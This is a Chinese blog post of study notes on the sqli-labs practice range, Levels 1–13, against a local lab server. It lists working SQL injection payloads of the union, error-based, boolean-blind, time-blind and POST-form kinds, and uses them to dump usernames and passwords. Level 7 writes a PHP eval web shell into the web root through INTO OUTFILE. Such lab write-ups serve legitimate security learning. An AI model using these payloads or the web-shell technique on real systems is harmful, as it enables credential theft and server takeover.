【sqlilabs刷题笔记1】Basic Injections
既然做了sql注入基础知识的整理,索性对sql注入重新巩固一下,这里选择刷一刷sqlilabs靶场来进行一个简单的回顾,受篇幅影响,此篇博客只整理Page-1(Basic Injections)部分
Less-1 GET字符型注入
解题过程
打开网页,显示
Welcome Dhakkan
Please input the ID as parameter with numeric value
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=1 and 1=2 |
正常回显,说明是字符型注入
令id为1‘,发现报错为You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near ‘’1’’ LIMIT 0,1’ at line 1
由此判断应该是单引号闭合
下面用order by判断字段数
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=-1' order by 4--+ |
发现id增加到4时才爆错,说明字段数为3
下面爆数据库名
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=-1' union select 1,database(),3--+ |
得知数据库名字是security
下面开始爆数据库的表名
1 | `http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+` |
表名有emails,referers,uagents,users
显然我们需要users这个表里的数据,所以下面开始爆users表的列名
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name ="users"--+ |
获得列名有user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password
下面获取username和password
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username,0x2a,password),3 from security.users--+ |
成功!
Less-1总结
- –+可以把后面的sql语句注释掉
- 字符型注入闭合方式判断方法
- sql注入最基础步骤
- 联合查询思想,order by判断字段数方法
Less-2 GET整数型注入
解题过程
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-2/?id=1 and 1=2 |
回显错误,说明是整数型注入
同less-1,
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-2/?id=-1 order by 4--+ |
判断出字段数为3
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-2/?id=-1 union select 1,database(),3--+ |
获得数据库名security
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ |
获得表名emails,referers,uagents,users
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ |
获得列名user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(username,0x2a,password),3 from users--+ |
获得username和password
Less-2总结
1.学会怎么区分字符型和整数型注入(and 1=2来判断)
2.巩固sql注入的基础部分
Less-3 GET字符型注入
解题过程
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=1 and 1=2 |
显示正常,判断为字符型注入
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=1' |
报错为You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’’) LIMIT 0,1’ at line 1
说明为’)闭合
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=-1') order by 4--+ |
用order by判断出字段数为3
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=-1') union select 1,database(),3--+ |
查得数据库名为security
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ |
查得表名有emails,referers,uagents,users
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ |
查得users表下的列名user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(username,0x2a,password),3 from users--+ |
成功获得username和password
Less-3总结
1.学会如何判断字符型注入的闭合方式
Less-4 GET字符型注入(双引号闭合)
解题过程
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=1 and 1=2 |
回显没有问题,说明是字符型注入
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=1' |
回显也没有问题,说明可能是双引号闭合
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=1" |
回显为You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“1””) LIMIT 0,1’ at line 1
说明为“)闭合
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=-1") order by 4--+ |
用order by判断字段数为3
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=-1") union select 1,database(),3--+ |
获得数据库名为security
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ |
获得security库下的表名emails,referers,uagents,users
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ |
获得users表下的列名user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(username,0x2a,password),3 from users--+ |
成功获取username和password
Less-4总结
1.学会双引号闭合的sql注入方式
Less-5 GET字符型报错注入
解题过程
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1 |
回显显示You are in………..,没有回显位置,说明不能用联合注入,得盲注
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1 and 1=2 |
回显不变,说明为字符型注入
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1' |
回显为You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’’ LIMIT 0,1’ at line 1
说明为’闭合,而且有报错,推测可能存在报错注入
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ |
注意这里是1’而不是-1’
由此可以获取数据库名为security,而且在concat函数里面,中间的参数需要再select一次
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+ |
发现security库下的表名为emails,referers,uagents,users
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+ |
发现回显显示并不完整:XPATH syntax error: ‘~user_id,first_name,last_name,us’
这是因为updatexml()函数只能显示32位,需要left(),substr(),right()函数等进行辅助
这里采用substr函数:
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,32),0x7e),1)--+ |
注意substr()函数从1开始!这里回显为XPATH syntax error: ‘~user_id,first_name,last_name,us’
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,32),0x7e),1)--+ |
这里回显为XPATH syntax error: ‘~er,password,avatar,last_login,f’
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-5/ |
回显为XPATH syntax error: ‘~ailed_login,id,username,passwor’
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-5/ |
回显为XPATH syntax error: ‘d‘
组合回显可获得列名
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-5/ |
一系列代码成功获取username和password
Less-5总结
1.学会报错注入,updatexml()函数
2.注意substr()是从1开始
3.updatexml()函数只会显示32位结果
4.由于在concat时的0x7e,每次substr截断的时候第一位都是0x7e,所以每次都是加31,也就是1,32,63……
Less-6 GET字符型报错注入
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1 |
和less5一样没有回显位置,不能联合注入
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1 and 1=2 |
回显正常,说明是字符型注入
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1' |
回显正常,说明不是单引号闭合
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1" |
回显报错为You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“1”” LIMIT 0,1’ at line 1,说明可能可以报错注入,且为双引号闭合
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ |
获得数据库名为security
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1" union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' ),0x7e),1)--+ |
获得表名为emails,referers,uagents,users
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1" union select updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' ),1,32),0x7e),1)--+ |
一系列代码获取列名
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-6/?id=1" union select updatexml(1,concat(0x7e,substr((select group_concat(username,0x2a,password) from users),1,32),0x7e),1)--+ |
一系列代码获得账户密码
Less-6总结
1.思路和less-5基本相同,巩固了报错注入语法
Less-7 GEToutfile注入
解题过程
布尔盲注
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1 |
未显示回显位置,说明联合注入不行
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1 and 1=2 |
回显正常,说明是字符型注入
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1' |
回显报错但没有显示错误信息,说明不是报错注入,而且是单引号类型闭合
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1'))--+ |
反复尝试后,发现是‘))闭合
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1')) and substr((select database()),1,1)='s'--+ |
数据库名第一个字符是s
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1')) and substr((select database()),2,1)='e'--+ |
数据库名第二个字符是e
不断重复,发现数据库名是security(这里可以用bp抓包,然后标记单引号里的内容和增加的数字处进行爆破)
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1')) and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e'--+ |
同样可以用burp代替和辅助工作,从而获取表名
同理,可以获取列名,获取username和password
outfile
题目里面提示use outfile
1、outfile是将检索到的数据,保存到服务器的文件内:
格式:select * into outfile “文件地址”
示例:
mysql> select * into outfile ‘f:/mysql/test/one’ from teacher_class;
2、文件是自动创建的。
简单的说,就是用该方法可以将查询到的结果输出到文件中。这就很美好了,因为在前台无法输出我们想得到的数据,通过该方法,那么我们仍然可以得到查询结果。
mysql在配置文件中限制了导入导出的路径,因为less7不会显示信息,所以可以回到less1去看这个路径是什么(实践中,可以同时利用同一 Web 中的多个注入点)。
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-1/?id=-1' union select 1,@@basedir,@@datadir --+ |
@@datadir数据库存储路径
@@basedir mysql安装路径
Your Login name:D:/phpStudy/PHPTutorial/MySQL/
Your Password:D:\phpStudy\PHPTutorial\MySQL\data\
首先要在MySQL下的my.ini配置文件里加这么一句话
secure_file_priv="/"
然后重启phpstudy,这样才能进行文件导出操作(我就是没改配置文件然后复现失败琢磨好久QAQ)
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-7/?id=1')) UNION SELECT 1,2,'<?php @eval($_POST["attack"]);?>' into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\bachang\\sqli-labs-master\\Less-7\\text.php"--+ |
这里得注意转义的问题,所以所有“\”都得双写
然后用蚁剑连接url为http://127.0.0.1/bachang/sqli-labs-master/Less-7/text.php即可
其实只要是数据库存储路径和mysql安装路径所在盘符就能用outfile把一句话木马写进去
且只要是得在www文件夹下面的路径,因为这样蚁剑才能连进本地ip
不一定需要得在less-7文件夹下面
Less-7总结
1.布尔盲注,联合burpsuite进行爆破
2.利用outfile进行文件上传来getshell:
select xxx(可以包含一句话木马,字段数同联合查询前的字段数) into outfile 文件路径–+
3.@@datadir数据库存储路径
@@basedir mysql安装路径
Less-8 GET字符型布尔盲注
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-8/?id=1 and 1=2 |
回显正常,说明字符型注入,无回显位置,说明不是联合注入
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-8/?id=1' |
无回显,说明单引号闭合,而且尝试后发现刚好是‘闭合
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-8/?id=1' order by 3--+ |
发现列数为3
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-8/?id=1'--+ |
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-8/?id=1' and substr((select database()),1,1)='s'--+ |
开始持续爆数据库名,最终发现数据库名字是security
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e'--+ |
同上,用万能的burpsuite即可
Less-9 GET字符型时间盲注
本来要按照less-8的方法故技重施,但是发现,这里无论我们咋注,页面都会骗我们说you are in……
狡猾狡猾!
那显然这边就是时间盲注了,还是有一点小烦的。
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-9/?id=1 and sleep(5)--+ |
反应飞快,显然不是数字型
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-9/?id=1' and sleep(5)--+ |
反应慢了,5秒之后才加载出来,所以是字符型,而且是单引号闭合
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-9/?id=1' and if(substr(database(),1,1)='s',1,sleep(5))--+ |
这边burp爆破,直接爆出数据库是security
下面开始爆数据库名
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='c',1,sleep(5))--+ |
爆破得表名
接下来改改select后面的内容即可
Less-10 GET字符型时间盲注
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-10/?id=1 and sleep(5)--+ |
反应飞快
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-10/?id=1' and sleep(5)--+ |
反应飞快
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-10/?id=1" and sleep(5)--+ |
反应慢了,说明是字符型时间盲注,而且是双引号闭合
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-10/?id=1" and if(substr((select database()),1,1)='s',1,sleep(5))--+ |
开始爆破数据库名,依旧是是熟悉的security
1 | http://127.0.0.1/bachang/sqli-labs-master/Less-10/?id=1" and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='s',1,sleep(5))--+ |
爆表名,之后一切照旧
Less-11 POST字符型注入
11关是一个表单了,随便令username=1,password=2试试,然后bp抓了一下包
发现抓的包中,post的参数为:uname=1&passwd=2&submit=Submit
1 | uname=1'&passwd=2&submit=Submit |
随便试了一下,发现就直接报错了
这边试了很久,发现要把那个参数submit改成Submit,不然hackbar和burpsuite都不能正确post参数,我也不知道为什么会这样。
1 | uname=1'&passwd=2&Submit=Submit |
报错为You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near ‘2’ LIMIT 0,1’ at line 1
在1打的引号跑2去了,不过应该问题不大,而且可以发现,应该是字符型注入
这边要注意,get型的sql注入能用+代替空格,但是POST型就得用– 或者#了(注意–后面有个空格)
1 | uname=1' or 1=1-- &passwd=2&Submit=Submit |
1 | uname=1' order by 2-- &passwd=2&Submit=Submit |
判断列数,发现这次只有两列了
1 | uname=-1' union select 1,database()-- &passwd=2&Submit=Submit |
查数据库名
1 | uname=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'-- &passwd=2&Submit=Submit |
查表名
1 | uname=-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'-- &passwd=2&Submit=Submit |
查列名
1 | uname=-1' union select 1,group_concat(username,0x2a,password) from security.users-- &passwd=2&Submit=Submit |
获取数据
Less-12 POST字符型注入
1 | uname=-1") union select 1,group_concat(username,0x2a,password) from security.users-- &passwd=2&Submit=Submit |
可以说和上面没有区别了
就懒得写步骤了
Less-13 POST字符型双注入
1 | uname=1'&passwd=2&Submit=Submit |
报错:You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near ‘2’) LIMIT 0,1’ at line 1
所以是‘)闭合
1 | uname=1') order by 2-- &passwd=2&Submit=Submit |
判断列数
由于错误是有回显位置的,所以可以报错注入
1 | uname=1') union select updatexml(1,concat(0x7e,(select database()),0x7e),1)-- &passwd=2&Submit=Submit |